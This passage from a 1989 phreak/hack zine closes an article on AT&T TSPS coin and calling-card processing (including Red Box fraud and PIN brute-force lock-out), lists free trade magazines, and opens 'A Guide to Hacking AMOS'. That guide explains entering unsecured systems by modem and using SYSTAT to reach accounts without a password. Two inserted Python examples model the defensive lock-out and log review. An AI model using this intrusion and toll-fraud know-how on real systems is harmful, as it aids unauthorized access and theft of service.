    position, the operator is prompted by a "zip" tone, and is alerted by a
    KIND OF CALL lamp, which provides information as to whether the call is
    coin, noncoin, 0+, 0-...If no operator service is required, the MF
    digits are outpulsed along the appropriate routing.

5.4) Call Connection
====================

  - If operator action was needed, upon the operator's disconnect of the
    line (position released), the network connection between the TSPS trunk
    and the base remote trunk is severed. The established through connection
    is now placed in a call floating (talking) state until disconnect.

5.5) Call Disconnection
=======================

  - Both ends of a connected call are monitored for an off-hook state
    change, which upon indication, must occur long enough to be recognized
    as an actual disconnect (and not merely a flash...). Another manner of
    disconnect is from a called party Time Released Disconnect (TRD), which
    is employed to limit billed party liability and release network
    connections. Example: A customer requests a disconnect after x number of
    minutes, or after $x.xx. The final action in a disconnect is to return
    the TSPS trunk to an idle position, which then awaits recognition of
    another service request.

5.6) AMA Data Accumulation and Reception
========================================

registered, and prepared for billing. The following is just some of the
information that is recorded on disk for processing.

  - Call Connect
  - Elapsed time
  - Signaling Irregularities
  - WalkAway Toggle (coin station fraud...discussed later)
  - Type of number billed

6.0 Coin Station Calls and ACTS Processing
==========================================

In general, coin station calls can be divided into 1+, 0+ and 0- originated
calls, not including 0+ and 0- CCS calls which will be discussed later in
this file. All calls falling into these categories go through the following
basic operations, many of which were described in section 5 of this file.
(The [] indicate operations that may or may not be present, depending on the
type of call placed)

  - 1) Trunk Seizure
  - 2) Digit Reception
  - 3) Bridging a Position [and Coin Detection and Announcement (CDA)]
  - 4) [Operation Action and] Digit Outpulsing.
  - 5) Talking Connection
  - 6) Call Disconnect
  - 7) AMA Processing

6.1 Automated Call Processing
=============================

All coin station calls requiring coin input from the customer are handled by
the Automated Toll Services (ACTS) which is implemented by the Station
Signaling and Announcement Subsystem (SSAS).
The SSAS automates the initial contact on most 1+ (station paid) toll calls,
by transmitting an announcement requesting the initial deposit from the
customer, and counting the deposits. If an unusual delay occurs during the
coin deposit period, the SSAS will prompt the user for the remaining deposit
needed to complete the call. Upon completion of sufficient deposit, SSAS
provides an acknowledgement announcement thanking the customer, and then
causes the outpulsing of the called digits to be handled by the Stored
Program Control (SPC). This delay in outpulsing prevents free, short
duration messages and keeps the audible ring of the called party from
interfering with coin detection signals. Any customer over-deposit is
automatically credited towards overtime charges. SSAS can accommodate
initial periods of up to 6 minutes, at the end of which the local office
rate schedule is accessed and an announcement may or may not notify the
customer of the end of the initial period.

6.2 Operator Intervention
=========================

If at any time during the coin collection period, a customer fails to
deposit sufficient funds (within a specified time period), or a flash is
registered on the switchhook, a TSPS operator will be bridged onto the call.
In this event SSAS will monitor the coin deposits via a type I CDA circuit;
however all automated coin announcements will be suppressed.

All calls originating from postpay coin stations must initially be handled
by an operator, in that postpay coin stations lack coin return equipment,
and cannot return deposited coins (i.e.- Postpay stations do not have a coin
hopper, only a coin box). This physical restriction requires the operator to
verify that the correct party has been reached (and goes off-hook), before
the customer makes any deposit. Upon verification, a type II CDA circuit is
connected to count and monitor the coin deposits.
This type of circuit is also connected whenever there is a large amount of
change associated with the call. This is because the coin hoppers on
standard payphones can only handle limited deposits. If a deposit exceeds
the hopper limit, an operator will be bridged to the circuit to make a
series of partial collections.

6.3 SSAS Fully Automatic Criteria
=================================

The SSAS fully automates 1+ coin station calls (ACTS) if and only if all of
the following conditions are met. Failure to meet any of these conditions
results in operator intervention.

6.3.1) ACTS Converted Trunk Group
=================================

  - Coin Stations must be converted to provide DTMF coin deposit signals
    that the CDA can recognize.

6.3.2) Machine Ratable
======================

  - The TSPS must receive sufficient rating information; failure to do so
    will result in operator intervention.

6.3.3) Successful ANI
=====================

  - If ANIF or the call is ONI, an operator must be added to the circuit to
    record the calling number.

6.3.4) Cannot Be a Postpay Station
==================================

  - See previous explanation of postpay stations (6.2).

6.3.5) Cannot Have Large Charges
================================

  - See previous explanation (6.2).

6.4 Fraud Detection and Prevention
==================================

If a calling customer goes on-hook (hangs up) at the end of a conversation
and charges are still due, TSPS automatically sends a ringback signal to
that station in the attempt to get the customer to pick up the phone. If the
calling party answers, an ACTS overtime charge message is made requesting
the customer to deposit the remaining amount due.
At any time during this message, an operator may be connected to the circuit
and harass the customer for payment. If, however, 5 rings with a 4 second
interval occur without an off-hook state change, TSPS assumes a walkaway,
and a registered traffic counter is flagged, a walkaway bit set, and the
amount due is all registered as AMA data.

Whenever the called party is off-hook, ACTS is susceptible to generated coin
signals (Red Box Tones). In an attempt to prevent this fraud, a special type
II CDA is employed: Two-wire trunks are isolated between forward and back
party to monitor coin deposits. The talking path maintains conversation by
being routed through the type II CDA. When coin signals are detected, the
SSAS informs TSPS that a called party fraud is suspected. If more than one
detection occurs on one call, TSPS flags a fraud indicator on the call's AMA
record.

NOTE: A trunk group may or may not detect and/or record this information
depending on office criteria.

7.0 Calling Card Service and Billed Number Service
==================================================

I am assuming that everyone reading this file has at least some concept of
what a calling card is and how it would be utilized from a local office. The
CCS and BNS services are implemented in TSPS by CCIS hardware, SSAS and
several processing programs that will not be discussed in this file (ABEGN,
ACALL, ASEQ...). The CCS and BNS together provide for the customer an
automated credit card calling option that was initially implemented as an
alternative to third party billing, collect and large change calls.

In order for the CCS and BNS to function, they require that each TSPS
becomes a node on the SPC network, which then allows access to a nationwide
database of Billing Validation Applications (BVA). The BVA currently
consists of nodes which are connected by CCIS, and are in turn made up of
individual Billing Validation Files (BVF).
A BVF is a file of data that is needed by the SPC and associated database
software to process queries about the data. Each TSPS is integrated into the
SPC network and uses the CCIS direct signaling to access the BVA. Connected
in parallel to the BVA is the Network Call Denial (NCD), which allows call
denial to AT&T customers with outstanding bills.

The CCS billing number consists of a 10 digit billing number and a 4 digit
PIN. There are two categories that a CCS billing number can fall into and
they are as follows:

- 7.0.1) Directory Billing Number
  ===============================

  - The billing number is usually the directory number to which the card is
    billed, and is in the following format:

      NPA-NXX-XXXX : Where the NPA represents Numbering Plan Area, N is a
                     digit 2-9, and X is a digit 0-9.

- 7.0.2) Special Billing Number
  =============================

  - Whereas the typical CCS billing number is described above in 7.0.1,
    there exists a special type of billing number that bills the card to a
    special nondirectory billing number. The format for this type of card is
    as follows:

      RAO-(0/1)-XX-XXXX : Where the RAO is the Revenue Accounting Office
                          code which assigns the billing number. The X
                          represents a digit 0-9.

The PIN is a 4 digit number in the format of NYYY, where N is a digit 2-9,
and Y a digit 0-9. Each PIN is designated upon assignment to the customer as
either restricted or unrestricted. An unrestricted PIN can place calls to
all destinations. If the called number is the same as the billing number,
only the 4 digit PIN need be entered by the customer. A restricted PIN can
only be used for station calls to the billing number.

NOTE: A special billing number (section 7.0.2) can only have an unrestricted
PIN.

The CCS can be broken down into two basic categories of calling types and
they are as follows:

7.1 Customer Dialed CCS Call
============================

The customer initiates the CCS sequence by dialing a 0 + Called Number.
The Called number can take the format of a 7 digit number, a 14 digit number
or 01+ country code and national number. This information, as well as the
calling number (originating), is received by TSPS from the CO. OST is then
used to determine whether CCS is available/given to the customer. Based on
the determined OST features (Does phone have Touch Tone? Is it a coin
station?..), TSPS either routes the call to an operator or provides an
alerting tone and announcement to prompt the customer for the CCS number (in
the format discussed in sec 7.0). Assuming no operator intervention, the CCS
number is subjected to a series of checks and queries detailed below (sec
7.3).

7.2 Operator Dialed CCS Call
============================

There are several ways a customer can receive operator assistance in CCS
dialing.

  - 7.2.1) 0- call.
  - 7.2.2) 0+ Called Number +0
  - 7.2.3) 0+ Called Number +Switch-hook flash.
  - 7.2.4) 0+ Called Number +No Action.
  - 7.2.5) 0+ Called Number +OST feature information requiring operator
           intervention. Example: Call placed from rotary phone...
  - 7.2.6) 0+ octothorpe. A customer dials an octothorpe (pound key "#")
           after the initial 0.

When the position is seized, if the operator determines that a CCS call is
requested, the operator keys in the CCS number (or the PIN only) and the
call is subjected to a series of checks for validity, detailed below (sec
7.3).

7.2.1 Non-TSPS Dialed CCS Call
==============================

The TSPS operators do not serve all CCS users. Non-TSPS operators and
independent telephone companies also serve CCS customers, and must access
the BVA for validity checks. (Examples: mobile, marine, international...)
This access to the BVA is provided for cordboards and independent telephone
companies by reaching a nearby TSPS, via TSPS base unit inward trunks. A
distant operator may reach the BVA by any of the routing codes detailed in
section 4.2.6, and the CCS validation is subject to the same security checks
detailed below.
If a non-TSPS operator dials either KP+(1161 or 1162)+ST, the operator hears
a CCS alert tone, and then has one minute in which to dial the 14 digit CCS
number. The TSPS initiates a format check, an APF check (see 7.3), and
accesses the BVA to determine the status of the CCS number in question. The
following are the different corresponding announcements which would follow:

  - Calling Card Service Number Accepted, PIN unrestricted
  - Calling Card Service Number Accepted, PIN restricted
  - Calling Card Service Number Accepted, RAO unknown
  - Calling Card Service Number Rejected

If a CCS number is accepted, the connection to the non-TSPS operator is
terminated by the TSPS. If a rejection message results, the operator will be
prompted by the alert tone and may attempt to redial the CCS.

7.3 CCS Validation
==================

After the CCS billing number is keyed in (either by customer, TSPS operator,
or independent operator) the All PINs Fail (APF) feature may cause the card
to be rejected and the call to be halted. The APF is a security feature
designed to frustrate attempts at discovering valid PINs by a brute force
hack method (trial and error). A list of CCS validation failures is
maintained, which is updated with both invalid billing numbers and calling
numbers. When the number of failures for a given billing number exceeds a
specified threshold, in x amount of time, all subsequent attempts are
declared invalid for a certain amount of time y (Lock Out Time). Even if the
actual PIN is used during the lockout time, the CCS number would be
considered invalid, and the call process would be halted.

7.4 Billed Number Screening
===========================

The BNS service applies to collect and third party billing calls placed
through a TSPS operator. The BVF contains information designating certain
numbers as "collect denied" or "bill-to-third denied". Each time an operator
attempts to place a collect or third party billing number a BVA and a NCD
inquiry are made.
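
The format check from section 7.0 and the APF lock-out from section 7.3, as an added Python example that is not part of the original file and not any telephone-company code. The threshold, window and lock-out values, the in-memory BVF dictionary, the outcome strings and the 555-01xx sample numbers are all assumptions constructed for illustration.

```python
import hmac
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field

# Section 7.0 layout: 10-digit billing number followed by a 4-digit PIN (NYYY).
# The 4th digit tells the two billing-number categories apart:
#   2-9 -> directory number NPA-NXX-XXXX, 0/1 -> special number RAO-(0/1)-XX-XXXX.
# re.ASCII limits \d to 0-9 so non-ASCII digits fail the format check.
_CCS = re.compile(r"(\d{3})(\d)(\d{6})([2-9]\d{3})", re.ASCII)


def parse_ccs(digits):
    """Format check: return (kind, billing_number, pin) or None."""
    m = _CCS.fullmatch(digits)
    if m is None:
        return None
    kind = "special" if m.group(2) in "01" else "directory"
    return kind, digits[:10], m.group(4)


@dataclass
class AllPinsFail:
    """Per-billing-number failure list with a lock-out, as section 7.3 outlines."""
    threshold: int = 3       # assumed value; the article names no figure
    window: float = 300.0    # the article's "x", in seconds (assumed)
    lockout: float = 900.0   # the article's "y", in seconds (assumed)
    failures: dict = field(default_factory=lambda: defaultdict(deque))
    locked_until: dict = field(default_factory=dict)

    def is_locked(self, billing, now):
        return now < self.locked_until.get(billing, 0.0)

    def record_failure(self, billing, calling, now):
        q = self.failures[billing]
        q.append((now, calling))          # calling number kept for the audit trail
        while q and now - q[0][0] > self.window:
            q.popleft()                   # drop failures older than the window
        if len(q) > self.threshold:       # "exceeds a specified threshold"
            self.locked_until[billing] = now + self.lockout
            q.clear()


def validate(apf, bvf, digits, calling, called, now):
    """Run the format check, the APF check, then the (constructed) BVF lookup."""
    parsed = parse_ccs(digits)
    if parsed is None:
        return "rejected: format"
    kind, billing, pin = parsed
    if apf.is_locked(billing, now):
        return "rejected: APF lockout"    # applies even to the correct PIN
    record = bvf.get(billing)
    if record is None or not hmac.compare_digest(record["pin"], pin):
        apf.record_failure(billing, calling, now)   # unknown numbers count too
        return "rejected: invalid"
    if record["restricted"]:
        if kind == "special":
            return "rejected: inconsistent record"  # special numbers: unrestricted only
        if called != billing:
            return "rejected: restricted PIN"
    return "accepted"


def demo():
    # Constructed sample data: 555-01xx numbers, not real accounts.
    bvf = {
        "2125550123": {"pin": "4821", "restricted": False},
        "3125550145": {"pin": "7390", "restricted": True},
    }
    apf = AllPinsFail()
    caller, dest = "4155550167", "6175550189"
    out = []
    for t, guess in enumerate(["2000", "2001", "2002", "2003"]):
        out.append(validate(apf, bvf, "2125550123" + guess, caller, dest, float(t)))
    out.append(validate(apf, bvf, "21255501234821", caller, dest, 10.0))    # locked out
    out.append(validate(apf, bvf, "21255501234821", caller, dest, 904.0))   # lock-out over
    out.append(validate(apf, bvf, "31255501457390", caller, dest, 0.0))     # restricted PIN
    out.append(validate(apf, bvf, "31255501457390", caller, "3125550145", 0.0))
    return out


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Keying the failure list on the billing number rather than on the caller is what makes the lock-out hold when guesses arrive from many different calling numbers.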

8.0 Busy Line Verification
==========================

A dedicated network is provided to process BLV calls and traffic. This
network originates at the TSPS base office and connects through dedicated
trunks to toll, intertoll, and local offices. The equipment consists of the
BLV trunk, a TSPS-4 wire bridging repeater, a verification circuit at TSPS,
InComing Verification Trunks (ICVT), OutGoing Verification Trunks (OGVT) at
both toll and intertoll offices, and Incoming No Test Trunks (INTT) at local
offices. The TSPS gains access to a single local, toll, and/or intertoll
office.

The initial request for a BLV appears as a position seizure to a TSPS
operator over an incoming trunk via a local office or as an inward trunk via
a toll office. The initial loop seized becomes the originating loop and is
connected in position via an idle TSPS loop. In that the originating loop
cannot be connected to the verification loop, the operator must switch
between the two.

Security is maintained to ensure that a customer's privacy is not violated,
and consists of the following:

  - 8.0.1) Speech Scrambler at Console Level (not BLV trunk level).
  - 8.0.2) Alert Tone Generator (ATG).
  - 8.0.3) Translation of the NPA to 0XX or 1XX.
  - 8.0.4) Dedicated BLV trunks.
  - 8.0.5) Cross office security checks at toll offices.

8.1 BLV Processing
==================

When a customer requests that a BLV be performed on a certain number within
the TSPS's LAN the following actions are taken.

  - 8.1.1) The TSPS attempts to DDD the number in question, to confirm that
    the number is indeed busy. This action is performed so that, in the
    event that a recorded error announcement is reached, the operator may
    understand the nature of the error without the speech scrambler
    interfering in quality.

  - 8.1.2) If the line is confirmed to be busy and the customer requests
    further action, the operator then attempts verification through the BLV
    network.
    The operator then presses the VFY key, in which case an attempt at a BLV
    will be made if and only if the following conditions are met:

    - 8.1.2.1) There is an idle loop at the position
      ==============================================

      - This condition must be met because the BLV trunk must be placed in a
        loop with the Traffic Service Position. If there are no idle loops
        remaining the BLV cannot be processed. This condition can be gotten
        around by the operator pressing the POS TRSFR key, which causes all
        the calls in the hold state to be transferred to loops on the
        original operator position.

    - 8.1.2.2) The call is on an incoming/inward trunk
      ================================================

      - This ensures that an operator cannot perform a BLV without an
        originating customer request.

    - 8.1.2.3) The called party is off-hook
      =====================================

      - See 8.1.2.2

    - 8.1.2.4) The called number is a domestic number
      ===============================================

      - That is, the called number cannot be an overseas number.

    - 8.1.2.5) The call has no forward connection
      ===========================================

      - This ensures that the busy condition detected by the INTT is not due
        to the connection of the calling party.

    - 8.1.2.6) The line number can be verified
      ========================================

      - This condition would fail if the local office is not served by the
        BLV network...
      - ..or the number in question is excluded from BLV calls (Example:
        Emergency or Police Lines...)

  8.1.3) The BLV is performed and the BLV trunk dropped by pressing the REC
  MSG key for an incoming call or VFY for an inward call.

9.0 Conclusion : Acknowledgements and References
================================================

I have assumed that the reader of this file has a general working knowledge
of phone systems and their associated terminology.
As it is impossible to please everyone, some readers will find this file too
advanced while others will find it lacking in several areas...too bad. This
file has intentionally *not* covered previously released information on TSPS
found in files by other authors, in an attempt to provide the phreak/hack
community with another source of information to be used in conjunction with
the existing ones.

The following reading list is highly recommended for furthering one's
knowledge on TSPS, and is as follows:

  - Understanding TSPS Part 1: The Console - Written by The Marauder, LOD/H
    Technical Journal: Issue No. 1, file #4.
  - Busy Line Verification Part 1 - Written by Phantom Phreaker, Phrack
    Vol 2, Issue XI, file #10.
  - Busy Line Verification Part 2 - Written by Phantom Phreaker, Phrack
    Vol 2, Issue XII, file #8
  - Telephony Magazine

9.1 Acknowledgements
====================

  - Eastwind...the Man Behind the Garbage Can...
  - AT&T
  - My Local RBOC...and all of the Trash that's fit to print

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                P/HUN Issue #4, Volume 2: Phile 7 of 11
                ---------------------------------------

5/19/89              * Free Computer Magazines *              5/19/89
                                  by
                          + Southern Cross +
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

TPT Networking Management
1421 S. Sheridan
P.O. Box 21728
Tulsa, OK 74101-9977

Computer Design                                   Recommended
P.O. Box 2389
Tulsa, OK 74101-9933

Scientific Computing & Automation                 Recommended
301 Gibraltar Drive
P.O. Box 608
Morris Plains, NJ 07950-0608

Industrial Product Bulletin
301 Gibraltar Drive
P.O. Box 650
Morris Plains, NJ 07950-0650

Computer Products
301 Gibraltar Drive
P.O. Box 601
Morris Plains, NJ 07950-9813

Connect Journal of Computer Networking
3165 Kifer Rd.
P.O. Box 58145
Santa Clara, CA 95052

Microcomputer Solutions Magazine
Intel Corporation GRI-58
P.O. Box 58065
Santa Clara, CA 95052-8065

Evaluation Engineering
2504 North Tamiami Trail
Nokomis, FL 34275-9987

Electronics                                       Recommended
P.O. Box No. 2713
Clinton, Iowa 52735

Systems Integration
P.O. Box 5051
Denver, CO 80217

EDN                                               Recommended
P.O. Box 5262
Denver, CO 80217-9865

Computer Technology Review                        Recommended
West World Productions, Inc.
924 Westwood Blvd., Suite 650
Los Angeles, CA 90024-2910

Microwave Journal                                 Recommended
685 Canton Street
Norwood, MA 02062

NASA Tech Briefs                                  Recommended
Associated Business Publications
41 E. 42nd St., Suite 921
New York, NY 10164-0672

Computer & Software News
A Lebhar-Friedman Publication
Grand Central Station
P.O. Box 3119
New York, NY 10164-0659

Compliance Engineering                            Recommended
629 Massachusetts Avenue
Boxborough, MA 01719-9974

Government Computer News
P.O. Box 3705
McLean, VA 22103

Federal Computer Week
3110 Fairview Park Drive
Falls Church, VA 22042-4599

Defense Electronics                               Recommended
EW Communications, Inc.
P.O. Box 50249
Palo Alto, CA 94303-9983

Defense Computing                                 Recommended
P.O. Box 5286
Pittsfield, MA 01203-5286

Laurin Publishing Co., Inc.
Photonics Spectra
P.O. Box 2037
Pittsfield, MA 01202-9925

Computer Graphics Review
P.O. Box 12950
Overland Park, KS 66212-0950

Electronic Design                                 Recommended
VNU Business Publications
P.O. Box 5194
Pittsfield, MA 01203-5194

Electronic Products                               Recommended
P.O. Box 5317
Pittsfield, MA 01203-9899

Software Magazine                                 Not Recommended
P.O. Box 542
Winchester, MA 01890

Specialized Products Company                      Recommended
2117 W. Walnut Hill Lane
Irving, TX 75038-9955

The LAN Catalog & Black Box Catalog
Black Box Corporation
P.O. Box 12800
Pittsburgh, PA 15241-9912

Computer-Aided Engineering
A Penton Publication
1100 Superior Avenue
Cleveland, OH 44197-8006

PERX (catalog)
1730 S. Amphlett Blvd., Dept. 222
San Mateo, CA 94402

Anasco (catalog)
Commerce Center Building
42A Cherry Hill Drive
Danvers, MA 01923-9916

MetraByte Corporation (catalog)                   Recommended
440 Myles Standish Blvd.
Taunton, MA 02780

Micro Networks (A/D catalog)                      Recommended
324 Clark Street
Worcester, MA 01606

Programmer's Connection
7249 Whipple Ave. NW
North Canton, OH 44720

Burr-Brown Corporation (catalog)
P.O. Box 11400
Tucson, AZ 85734

WAVETEK San Diego (catalog)                       Recommended
P.O. Box 85434
San Diego, CA 92138

Digi-Key Corporation (catalog)                    Recommended
701 Brooks Avenue South
P.O. Box 677
Thief River Falls, MN 56701-0677

Consumertronics Co. (catalog)                     Recommended
2011 Crescent Drive, P.O. Drawer 537
Alamogordo, NM 88310

Time Motion Tools (catalog)
410 South Douglas Street
El Segundo, CA 90245

EXAR Corporation (modem design catalog)
750 Palomar Ave.
P.O. Box 3575
Sunnyvale, CA 94088
ATTN: Marketing Communications

Chilton's Instrumentation & Control News
Box 2006
Radnor, PA 19089-9975

Communications Week
P.O. Box 2070
Manhasset, NY 11030

Computer Systems News
CMP Publications, Inc.
600 Community Drive
Manhasset, NY 11030

Electronic Engineering Times
Circulation Dep't.
Box 2010
Manhasset, NY 11030

Network World
P.O. Box 1021
Southeastern, PA 19398-9979

Digital Review
P.O. Box 40065
Philadelphia, PA 19106-9931

Digital News
P.O. Box 593
Winchester, MA 01890-9953

DEC Professional
P.O. Box 503
Spring House, PA 19477-0503

Macintosh News
Circulations Dep't.
P.O. Box 2180
Manhasset, NY 11030

UNIX Today!
CMP Publications, Inc.
600 Community Drive
Manhasset, NY 11030

LAN Times
122 East 1700 South
P.O. Box 5900
Provo, UT 84601

Electronic Business
275 Washington Street
Newton, MA 02158-1630

PCNetwork
P.O. Box 457
Newton, NJ 07860

INFO World
P.O. Box 5994
Pasadena, CA 91107

Reseller Management                               Not Recommended
301 Gibraltar Drive
P.O. Box 601
Morris Plains, NJ 07950-9811

Computer Reseller News                            Not Recommended
CMP Publications, Inc.
600 Community Drive
Manhasset, NY 11030

This is a partial list of free computer magazines and newspapers of interest
to the hacker/phreaker community. Just ask for a free subscription form,
fill it out, and you'll have enough to read for a long time!
(You also get to stay on top of the "state" of the art)

The recommended mags have articles, products, schematics, and diagrams of
particular interest and application for most of the community. (You'll find
that they're an education unto themselves)

+SC+
Cruise Director
S.S. Phuntastic
(...lost in a sea of paper...)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+               P/HUN Issue #4, Volume 2: Phile 8 of 11               +
+               ---------------------------------------               +
+                       A Guide to Hacking AMOS                       +
+                       -----------------------                       +
+                           By NightCrawler                           +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The Alpha Micro computer is a fairly easy system to understand, for those of
you familiar with VAX systems. The operating system (AMOS) is a ripoff of
the DEC stuff, so many commands are similar. This is a guide on how to use
the Alpha.

Background on security:
---------- -- ---------

When the Alpha Micro leaves the factory, it does not have any type of
security feature built into it, except for certain higher end models, which
will be discussed later. Thus, if the user installs a modem directly to the
system, and you call in, you'll be at the OS level already. Pretty easy, eh?

Due to the lack of a cursor display character, the pound sign (#) will be
used to represent the cursor throughout this document. The prompt for AMOS
is a period, which users refer to as the dot. When you log on, you'll see
this:

    .#

At this point, you can type away and use the various accounts and programs
on the system. When you first connect, depending on how the last user left
the modem, you may or may not be logged in to a partition. To verify this,
type in the LOG command.

    .LOG

The computer will respond in one of two fashions. If it says "Not logged
in", then you will have to log to an existing account.
If it says "Current login is DSK1:[203,1]", then there is no need to scan for
an account right away.

Perhaps the most important thing to do after this is to do a SYSTAT, which
will let you know who else is on the system, which account each job is logged
into, what program is being run, and other info. Example:

    .SYSTAT

    Status of AMOS/L version 1.3D(165) on Friday, November 11, 1988 03:24:54 PM

    JOB1   TRM1   DSK1:201,3  0067732  ^C  CONECT  122880 bytes at 4505554
    JOB2   TRM2   DSK0:1,2    0024984  TI  SYSACT  176800 bytes at 4505554
    JOB3   TRM3   Not logged  0015460  ^C  MEMORY   12288 bytes at 3137554
    MODEM  HAYES  DSK0:1,4    0037325  SL  SYSTAT   67912 bytes at 2179023

    4 jobs allocated on system, 3 jobs in use (3 logged in)
    Total memory on system is 2048K bytes
    System uptime is 07:28:19

    DSK0   26402 blocks free      DSK1    3578 blocks free
    4 devices on system, total of 29980 blocks free

    .#

Here's a quick rundown on what each column means...

    Col 1: The name of the job
    Col 2: The terminal to which the job is attached
    Col 3: The device and account into which the job is logged
    Col 4: The octal memory address where the JCB is located
    Col 5: Terminal status for that job
    Col 6: Last program run by that job
    Col 7: Number of bytes (decimal) of memory allocated
    Col 8: Octal memory address for beginning memory partition

The rest is self explanatory. The 5th column (terminal status) has numerous
codes which need explaining. Here are the abbreviations and what they stand
for:

    TI   Terminal input wait state
    TO   Terminal output wait state
    LD   Program load state
    SL   Sleep state
    IO   I/O access other than terminal
    EW   External wait state
    RN   Running
    SP   Suspended state
    SW   Semaphore wait
    ^C   Control-C

The SYSTAT program can be used even when you are not logged in, which is a
plus if you wish to access an account without knowing the password.

There is another program, called STAT, but don't use this. It constantly
updates the screen, and will mess you up if you're using a modem.
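The SYSTAT listing above, parsed into its eight columns for an administrator's review. This is an added example, not part of the original phile: the function names and the two review rules (a terminal left not logged in, a job sitting in the operator account DSK0:[1,2]) are assumptions made here, and the sample input is the job rows from the listing above.

```python
import re

# Terminal-status codes as listed in the article.
STATUS = {"TI": "terminal input wait", "TO": "terminal output wait",
          "LD": "program load", "SL": "sleep", "IO": "non-terminal I/O",
          "EW": "external wait", "RN": "running", "SP": "suspended",
          "SW": "semaphore wait", "^C": "control-C"}

# One job row: name, terminal, login (or "Not logged"), JCB address,
# status code, last program, decimal byte count, partition base address.
ROW = re.compile(r"^(\S+)\s+(\S+)\s+(Not logged|\S+:\d+,\d+)\s+(\d+)\s+"
                 r"(\S+)\s+(\S+)\s+(\d+) bytes at (\d+)$")

# The job rows and summary line from the article's listing, as sample input.
SAMPLE = """\
JOB1 TRM1 DSK1:201,3 0067732 ^C CONECT 122880 bytes at 4505554
JOB2 TRM2 DSK0:1,2 0024984 TI SYSACT 176800 bytes at 4505554
JOB3 TRM3 Not logged 0015460 ^C MEMORY 12288 bytes at 3137554
MODEM HAYES DSK0:1,4 0037325 SL SYSTAT 67912 bytes at 2179023
4 jobs allocated on system, 3 jobs in use (3 logged in)
"""

def octal(text):
    """Convert an octal column; None if it holds an 8 or 9 (two sample values do)."""
    return int(text, 8) if re.fullmatch(r"[0-7]+", text) else None

def parse_systat(text):
    """Return one dict per job row; summary and blank lines are skipped."""
    jobs = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            name, term, login, jcb, code, prog, size, base = m.groups()
            jobs.append({"job": name, "terminal": term,
                         "login": None if login == "Not logged" else login,
                         "jcb": octal(jcb), "base": octal(base),
                         "status": STATUS.get(code, "unknown: " + code),
                         "program": prog, "bytes": int(size)})
    return jobs

def review(jobs, operator="DSK0:1,2"):
    """Flag jobs an administrator would want to look at (rules assumed here)."""
    findings = []
    for j in jobs:
        if j["login"] is None:
            findings.append((j["job"], "terminal not logged in"))
        elif j["login"] == operator:
            findings.append((j["job"], "logged into the operator account"))
    return findings
```

Because SYSTAT answers before any login, everything this parser extracts is visible to whoever reaches the prompt, which is why the operator-account row is worth flagging.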
Before going further, it should be mentioned how the Alpha Micro computer is
structured. On each system, a number of hard drives subdivided into logical
units are encountered. These may be named in any fashion by the sysop,
following only the limitation of the LU being three letters or less in length.
This is then followed by the device number. Sample LU's may look like: DSK0:,
DSK1:, WIN0:, HWK3:, etc.

On each disk is found a grouping of accounts, also known as partitions, or
PPN's (project, programmer number). It is these accounts that you log in to
and execute programs from. These are enclosed in square brackets [], to
separate them from the disk specification. When used all together, it looks
like this:

    DSK0:[1,2], DSK0:[1,4], WIN3:[100,0], DSK4:[377,7]

System Commands:
------ ---------

When in doubt, type HELP. This will give you some online information on the
system you are currently logged in to. Below is a list of some of the more
common commands that you can use.

ASCDMP -- displays the data in physical blocks in ASCII form.
ATTACH -- connects a job to a terminal.
BASIC  -- places you in interactive BASIC mode.
BATCH  -- loads frequently used commands to your memory partition.
BAUD   -- change the baud rate of your terminal.
CAL100 -- allows you to calibrate the clock oscillator.
CLEAR  -- write zeroes to all free disk blocks.
COMPIL -- use this to compile BASIC programs.
COPY   -- copies one or more files between accounts or disks.
CREATE -- creates a random file of specified size (any size!!).
CRT610 -- verifies quality of videocassette backup media.
DATE   -- returns with current system date.
DING   -- rings the terminal bell.
DIR    -- gives a directory listing for specific files or accounts.
DIRSEQ -- alphabetizes all current entries in an account.
DSKANA -- analyzes the data on a disk, and reports errors.
DSKCPY -- copies contents of one disk and places on another disk.
DSKDDT -- allows you to examine and change data directly on disk.
DSKPAK -- packs the blocks in use to create area of free blocks.
DUMP   -- display file contents & memory to the screen.
ERASE  -- deletes one or more files from disk.
ERSATZ -- displays the currently defined ersatz names.
FIX    -- disassemble assembler (.LIT) code.
FORCE  -- allows you to send terminal input to another job.
HELP   -- displays all available help files for the system.
JOBALC -- displays your job name.
JOBPRI -- determine your job priority, and change other's priority.
JOBS   -- shows all jobs on system, and how many are in use.
KILL   -- kill the program being run by another job, or a single job.
LNKLIT -- creates ML programs by linking object code files.
LOAD   -- loads disk files into your memory partition as mem modules.
LOG    -- logs you into an account so you can access the files there.
LOGOFF -- logs you out of the account you were logged into.
MAKE   -- creates the first record of a SEQ file (make a bogus file).
MEMORY -- allocates memory to your job (e.g. .MEMORY 64K).
MONTST -- tests the system monitor by bringing up the system anew.
MOUNT  -- see which disks are on the system. Do a /U to unmount a disk.
M68    -- assemble an assembler program to an unlinked ML file.
PASS   -- allows you to change your account password.
PPN    -- displays a list of all accounts on a logical device (eg DSK0:).
PRINT  -- send one or more files to a printer.
QDT    -- allows you to examine and modify locations in memory.
REBOOT -- reboots the system after hitting RETURN.
REDALL -- diagnostic test that looks at disk & reports read errors.
RENAME -- rename files in an account from one name to another.
RUN    -- runs a compiled BASIC program.
SAVE   -- save memory modules as disk files.
SEND   -- send messages to other terminals on the system.
SET    -- set terminal handling options for your terminal.
SLEEP  -- put your job to "sleep" for a period of time.
SORT   -- alphabetically & numerically sort data in a SEQ file.
STAT   -- displays & continually updates status of all system jobs.
SUBMIT -- used to enter, change, or delete files from task manager.
SYSACT -- used to change account passwords, or initialize a disk.
SYSTAT -- mentioned above.
TIME   -- displays or sets the time of day.
TRMDEF -- gives information about the system terminals.
TYPE   -- displays a text file to the screen (use the /P switch).
VCRRES -- read files from videocassette to disk.
VCRSAV -- save files from disk to videocassette.
VER    -- gives you version of current operating system level.
VUE    -- create and enter text editor. Use ESCape to toggle modes.

